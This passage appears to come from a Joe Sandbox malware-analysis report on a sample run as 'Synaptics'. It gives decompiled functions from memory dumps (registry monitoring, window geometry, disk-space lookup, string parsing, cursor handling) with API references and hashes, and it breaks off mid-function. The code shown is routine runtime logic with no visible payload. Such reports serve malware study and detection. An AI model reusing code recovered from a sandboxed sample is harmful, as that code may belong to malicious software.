                                                                                                                                                                                          • RegNotifyChangeKeyValue.ADVAPI32(?,?,00000005,?,000000FF,00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946DA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Can not start monitoring, xrefs: 004946E3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateEvent$ChangeNotifyValue
                                                                                                                                                                                          • String ID: Can not start monitoring
                                                                                                                                                                                          • API String ID: 2233126570-3835272546
                                                                                                                                                                                          • Opcode ID: e9bc4d888281bdc3d552610812b648f0ad08ccdec08c8ed41ad8283631ef98ab
                                                                                                                                                                                          • Instruction ID: 443d9707a36d2025ed6040a5d28f1c7387ed03c1380d4d8ed495eb8cf4c6426e
                                                                                                                                                                                          • Opcode Fuzzy Hash: e9bc4d888281bdc3d552610812b648f0ad08ccdec08c8ed41ad8283631ef98ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F0F4B06442016FDB54DFADCC85F1537A46F05715F1102A5FB14DF2D6E675DC048714
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00442ECC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00442ECC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t19;
				struct HWND__* _t20;
				intOrPtr* _t23;

				_t20 = __eax;
				_t1 =  &_a4; // 0x443144
				_t23 =  *_t1;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 =  &_v12; // 0x443144
				ClientToScreen(__eax, _t4);
				GetWindowRect(_t20,  &_v28);
				_t6 =  &_v12; // 0x443144
				 *_t23 =  *_t6 - _v28.left;
				_t19 = _v8 - _v28.top;
				 *((intOrPtr*)(_t23 + 4)) = _t19;
				return _t19;
			}









                                                                                                                                                                                          0x00442ed4
                                                                                                                                                                                          0x00442ed6
                                                                                                                                                                                          0x00442ed6
                                                                                                                                                                                          0x00442ed9
                                                                                                                                                                                          0x00442edc
                                                                                                                                                                                          0x00442edf
                                                                                                                                                                                          0x00442ee4
                                                                                                                                                                                          0x00442eee
                                                                                                                                                                                          0x00442ef3
                                                                                                                                                                                          0x00442ef9
                                                                                                                                                                                          0x00442efe
                                                                                                                                                                                          0x00442f01
                                                                                                                                                                                          0x00442f09

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClientRectScreenWindow
                                                                                                                                                                                          • String ID: D1D$D1D
                                                                                                                                                                                          • API String ID: 3371951266-2689743835
                                                                                                                                                                                          • Opcode ID: 3274c0dfdbe0219fc24fefe6f8f375bc8f66ff92587090afc903952a86c72523
                                                                                                                                                                                          • Instruction ID: 696a0ad0a36b5a628bc16ef9a9fef7e4a028d98c1b31806480246e0535002fd9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3274c0dfdbe0219fc24fefe6f8f375bc8f66ff92587090afc903952a86c72523
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF0A2B5D0420DAFCB00DFE9C9818DEFBFCEB08250F10456AA945F3741E630AA408BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E884 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040E884() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x49b158 = _t1;
				}
				if( *0x49b158 == 0) {
					 *0x49b158 = E00409ED4;
					return E00409ED4;
				}
				return _t1;
			}





                                                                                                                                                                                          0x0040e88a
                                                                                                                                                                                          0x0040e88f
                                                                                                                                                                                          0x0040e893
                                                                                                                                                                                          0x0040e89b
                                                                                                                                                                                          0x0040e8a0
                                                                                                                                                                                          0x0040e8a0
                                                                                                                                                                                          0x0040e8ac
                                                                                                                                                                                          0x0040e8b3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040e8b3
                                                                                                                                                                                          0x0040e8b9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F2ED,00000000,0040F300), ref: 0040E88A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                                                                                                          • Opcode ID: 48bbcabc8f02b2d24e1da495698a7276f8bc32b2cd4885076d013a1cd8d10edc
                                                                                                                                                                                          • Instruction ID: 06fc51cb68962c5c382d4d7a2f86af93b26a51ec458fff072f92dd4ff1898c2b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 48bbcabc8f02b2d24e1da495698a7276f8bc32b2cd4885076d013a1cd8d10edc
                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD09E62A043C55AF700BBA6A9EA7162658D720344B24C83BA000773D2D7FD4C94979D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041CE2C Relevance: 6.4, APIs: 5, Instructions: 120COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E0041CE2C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				void* _t71;
				char _t72;
				char _t73;
				intOrPtr _t88;
				CHAR* _t91;
				CHAR** _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;

				_t96 = _t97;
				_t98 = _t97 + 0xfffffff4;
				_v16 = 0;
				_t71 = __edx;
				_v8 = __eax;
				_t94 =  &_v12;
				 *[fs:eax] = _t98;
				E0041BEF0(_v8);
				 *[fs:eax] = _t98;
				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x41cf5e, _t96,  *[fs:eax], 0x41cf7b, _t96, __edi, __esi, __ebx, _t95);
				 *_t94 = E00404E80(_t71);
				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
					 *_t94 = CharNextA( *_t94);
				}
				while(1) {
					_t72 =  *( *_t94);
					if(_t72 == 0) {
						break;
					}
					if(_t72 != E0041CFA4(_v8)) {
						_t91 =  *_t94;
						while(1) {
							_t73 =  *( *_t94);
							if(_t73 <= 0x20 || _t73 == E0041CF8C(_v8)) {
								break;
							}
							 *_t94 = CharNextA( *_t94);
						}
						E00404AB0( &_v16,  *_t94 - _t91, _t91);
						L11:
						 *((intOrPtr*)( *_v8 + 0x38))();
						while( *( *_t94) - 0xffffffffffffffe1 < 0) {
							 *_t94 = CharNextA( *_t94);
						}
						if(E0041CF8C(_v8) !=  *( *_t94)) {
							continue;
						}
						if( *(CharNextA( *_t94)) == 0) {
							 *((intOrPtr*)( *_v8 + 0x38))();
						}
						do {
							 *_t94 = CharNextA( *_t94);
						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
						continue;
					}
					E004091D4(_t94,  &_v16, E0041CFA4(_v8));
					goto L11;
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E0041CF65);
				return E0041BFAC(_v8);
			}
















                                                                                                                                                                                          0x0041ce2d
                                                                                                                                                                                          0x0041ce2f
                                                                                                                                                                                          0x0041ce37
                                                                                                                                                                                          0x0041ce3a
                                                                                                                                                                                          0x0041ce3c
                                                                                                                                                                                          0x0041ce3f
                                                                                                                                                                                          0x0041ce4d
                                                                                                                                                                                          0x0041ce53
                                                                                                                                                                                          0x0041ce63
                                                                                                                                                                                          0x0041ce6b
                                                                                                                                                                                          0x0041ce75
                                                                                                                                                                                          0x0041ce83
                                                                                                                                                                                          0x0041ce81
                                                                                                                                                                                          0x0041ce81
                                                                                                                                                                                          0x0041cf3c
                                                                                                                                                                                          0x0041cf3e
                                                                                                                                                                                          0x0041cf42
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041ce9b
                                                                                                                                                                                          0x0041ceb3
                                                                                                                                                                                          0x0041cec1
                                                                                                                                                                                          0x0041cec3
                                                                                                                                                                                          0x0041cec8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041cebf
                                                                                                                                                                                          0x0041cebf
                                                                                                                                                                                          0x0041cedf
                                                                                                                                                                                          0x0041cee4
                                                                                                                                                                                          0x0041ceec
                                                                                                                                                                                          0x0041cefb
                                                                                                                                                                                          0x0041cef9
                                                                                                                                                                                          0x0041cef9
                                                                                                                                                                                          0x0041cf10
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041cf1d
                                                                                                                                                                                          0x0041cf26
                                                                                                                                                                                          0x0041cf26
                                                                                                                                                                                          0x0041cf29
                                                                                                                                                                                          0x0041cf31
                                                                                                                                                                                          0x0041cf38
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041cf29
                                                                                                                                                                                          0x0041ceac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041ceac
                                                                                                                                                                                          0x0041cf4a
                                                                                                                                                                                          0x0041cf4d
                                                                                                                                                                                          0x0041cf50
                                                                                                                                                                                          0x0041cf5d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CE7C
                                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CEF4
                                                                                                                                                                                          • CharNextA.USER32(?,?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CF15
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CF2C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3213498283-0
                                                                                                                                                                                          • Opcode ID: 1fdf7e38554d3ddef2dffed84f85b628e6addbc14ec20851bbf473ee18a56b48
                                                                                                                                                                                          • Instruction ID: 11efbd69cb5f73df2cbcf5fefe28e22a1c1bddc5dbaf51a38cd0fed122abd7e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fdf7e38554d3ddef2dffed84f85b628e6addbc14ec20851bbf473ee18a56b48
                                                                                                                                                                                          • Instruction Fuzzy Hash: A1415130A44244DFCB11DF79C991999BBF6EF5A30472404AAF4C1D7392C738AD82DB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00438E8C Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E00438E8C(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x49eb54 != 0) {
					L3:
					_t49 =  *0x49eb34; // 0x0
					_t50 =  *0x49eb34; // 0x0
					_t117 = E00438D6C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x49eb54 == 0) {
						_t168 =  *0x49eb58;
						if( *0x49eb58 != 0) {
							_t106 =  *0x49eb48; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x49eb58; // 0x0
							E00443038(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x49eb34; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x49eb54;
						_t6 =  &_v24;
						 *_t6 =  *0x49eb54 != 0;
						__eflags =  *_t6;
						 *0x49eb54 = 2;
					} else {
						 *0x49eb54 = 1;
						_v24 = 0;
					}
					_t54 =  *0x49eb38; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x49eb38; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x49eb38; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x49eb38; // 0x0
							E0043AAC0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x49eb38; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E00438DBC(2);
						_t121 =  *_t155;
						_t60 =  *0x49eb38; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x49eb58 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x49eb58; // 0x0
								E00443020(_t82, _t158);
								_t84 =  *0x49eb58; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x49eb58; // 0x0
									E00443120(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x49eb58; // 0x0
									E00443038(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x49eb58; // 0x0
								E00443194(_t91, _t131, __eflags);
								_t93 =  *0x49de0c; // 0x49ebbc
								SetCursor(E004586EC( *_t93, _t158));
							}
						}
						_t62 =  *0x49de0c; // 0x49ebbc
						_t65 = SetCursor(E004586EC( *_t62, _t158));
						if( *0x49eb54 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00438DF8(_t121);
								_t67 =  *0x49eb38; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0043AAC0(_t118,  &_v24, _t155);
									_t65 = E00403DE8(_t118, __eflags);
									_t135 =  *0x49eb38; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x49eb38; // 0x0
									_t65 = E00403DE8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x49eb38; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x49eb38; // 0x0
								_t65 = E00403DE8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x49eb38 == 0) {
								goto L32;
							} else {
								_t119 =  *0x49eb38; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00408E50(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x49eb38; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x49eb38; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x49eb38; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E00438DBC(1);
					if( *0x49eb38 == 0) {
						goto L32;
					}
					_t102 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E00438DBC(0);
					if( *0x49eb38 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x49eb44; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x49eb50; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x49eb48; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x49eb50; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                                                                                                                                                                          0x00438e92
                                                                                                                                                                                          0x00438e9b
                                                                                                                                                                                          0x00438eca
                                                                                                                                                                                          0x00438eca
                                                                                                                                                                                          0x00438ed0
                                                                                                                                                                                          0x00438ee6
                                                                                                                                                                                          0x00438eef
                                                                                                                                                                                          0x00438ef1
                                                                                                                                                                                          0x00438ef8
                                                                                                                                                                                          0x00438efa
                                                                                                                                                                                          0x00438f00
                                                                                                                                                                                          0x00438f0d
                                                                                                                                                                                          0x00438f12
                                                                                                                                                                                          0x00438f12
                                                                                                                                                                                          0x00438ef8
                                                                                                                                                                                          0x00438f17
                                                                                                                                                                                          0x00438f23
                                                                                                                                                                                          0x00438f33
                                                                                                                                                                                          0x00438f3a
                                                                                                                                                                                          0x00438f3a
                                                                                                                                                                                          0x00438f3a
                                                                                                                                                                                          0x00438f3f
                                                                                                                                                                                          0x00438f25
                                                                                                                                                                                          0x00438f25
                                                                                                                                                                                          0x00438f2c
                                                                                                                                                                                          0x00438f2c
                                                                                                                                                                                          0x00438f46
                                                                                                                                                                                          0x00438f4e
                                                                                                                                                                                          0x00438f9b
                                                                                                                                                                                          0x00438f9b
                                                                                                                                                                                          0x00438fa2
                                                                                                                                                                                          0x00438fa8
                                                                                                                                                                                          0x00438fab
                                                                                                                                                                                          0x00438fb4
                                                                                                                                                                                          0x00438fbc
                                                                                                                                                                                          0x00438fc4
                                                                                                                                                                                          0x00438fc9
                                                                                                                                                                                          0x00438fd2
                                                                                                                                                                                          0x00438fd9
                                                                                                                                                                                          0x00438fd9
                                                                                                                                                                                          0x00438fe7
                                                                                                                                                                                          0x00438fe9
                                                                                                                                                                                          0x00438feb
                                                                                                                                                                                          0x00438ff5
                                                                                                                                                                                          0x00438ffe
                                                                                                                                                                                          0x00439002
                                                                                                                                                                                          0x0043900c
                                                                                                                                                                                          0x00439011
                                                                                                                                                                                          0x00439016
                                                                                                                                                                                          0x0043901b
                                                                                                                                                                                          0x0043901f
                                                                                                                                                                                          0x0043903a
                                                                                                                                                                                          0x0043903f
                                                                                                                                                                                          0x00439044
                                                                                                                                                                                          0x00439021
                                                                                                                                                                                          0x00439025
                                                                                                                                                                                          0x0043902c
                                                                                                                                                                                          0x0043902e
                                                                                                                                                                                          0x00439033
                                                                                                                                                                                          0x00439033
                                                                                                                                                                                          0x0043904b
                                                                                                                                                                                          0x0043904b
                                                                                                                                                                                          0x00439050
                                                                                                                                                                                          0x00439058
                                                                                                                                                                                          0x00439065
                                                                                                                                                                                          0x00439065
                                                                                                                                                                                          0x00439002
                                                                                                                                                                                          0x0043906d
                                                                                                                                                                                          0x0043907a
                                                                                                                                                                                          0x00439086
                                                                                                                                                                                          0x00439159
                                                                                                                                                                                          0x00439159
                                                                                                                                                                                          0x0043908c
                                                                                                                                                                                          0x0043908c
                                                                                                                                                                                          0x0043908e
                                                                                                                                                                                          0x004390af
                                                                                                                                                                                          0x004390b1
                                                                                                                                                                                          0x004390b6
                                                                                                                                                                                          0x004390b9
                                                                                                                                                                                          0x004390bb
                                                                                                                                                                                          0x004390e9
                                                                                                                                                                                          0x004390f8
                                                                                                                                                                                          0x004390fd
                                                                                                                                                                                          0x00439103
                                                                                                                                                                                          0x004390bd
                                                                                                                                                                                          0x004390c5
                                                                                                                                                                                          0x004390d1
                                                                                                                                                                                          0x004390d6
                                                                                                                                                                                          0x004390dc
                                                                                                                                                                                          0x004390dc
                                                                                                                                                                                          0x00439090
                                                                                                                                                                                          0x00439093
                                                                                                                                                                                          0x00439096
                                                                                                                                                                                          0x004390a3
                                                                                                                                                                                          0x004390a3
                                                                                                                                                                                          0x0043910d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043910f
                                                                                                                                                                                          0x0043910f
                                                                                                                                                                                          0x00439115
                                                                                                                                                                                          0x00439118
                                                                                                                                                                                          0x00439120
                                                                                                                                                                                          0x00439127
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043912e
                                                                                                                                                                                          0x00439130
                                                                                                                                                                                          0x00439137
                                                                                                                                                                                          0x00439137
                                                                                                                                                                                          0x0043913a
                                                                                                                                                                                          0x00439141
                                                                                                                                                                                          0x00439144
                                                                                                                                                                                          0x0043914f
                                                                                                                                                                                          0x00439150
                                                                                                                                                                                          0x00439151
                                                                                                                                                                                          0x00439152
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00439152
                                                                                                                                                                                          0x0043910d
                                                                                                                                                                                          0x00439086
                                                                                                                                                                                          0x00438f52
                                                                                                                                                                                          0x00438f5e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438f64
                                                                                                                                                                                          0x00438f69
                                                                                                                                                                                          0x00438f6c
                                                                                                                                                                                          0x00438f74
                                                                                                                                                                                          0x00438f77
                                                                                                                                                                                          0x00438f7e
                                                                                                                                                                                          0x00438f84
                                                                                                                                                                                          0x00438f89
                                                                                                                                                                                          0x00438f95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438f95
                                                                                                                                                                                          0x00438e9d
                                                                                                                                                                                          0x00438ea4
                                                                                                                                                                                          0x00438ea9
                                                                                                                                                                                          0x00438eaf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438eb1
                                                                                                                                                                                          0x00438eb9
                                                                                                                                                                                          0x00438ebc
                                                                                                                                                                                          0x00438ebe
                                                                                                                                                                                          0x00438ec4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00438F00
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00439025
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0043907A
                                                                                                                                                                                            • Part of subcall function 00443194: 73751770.COMCTL32(00000000,?,00439055), ref: 004431B0
                                                                                                                                                                                            • Part of subcall function 00443194: ShowCursor.USER32(000000FF,00000000,?,00439055), ref: 004431CB
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00439065
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor$DesktopWindow$73751770Show
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 978888386-0
                                                                                                                                                                                          • Opcode ID: 93ca7b10fa435c23d891b28464925a9332c02dd8bf1b3bb2ac27d7e48d7edd04
                                                                                                                                                                                          • Instruction ID: 7774f5f5771a5045a1e06358bb4aae0e40f1de296239ba1c3ef58bb47b11143b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 93ca7b10fa435c23d891b28464925a9332c02dd8bf1b3bb2ac27d7e48d7edd04
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C919174606241DFE704DF2AD885A06B7F1BB69314F14907BE4069B3A2CB78FC85CB4A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004107F0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E004107F0(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
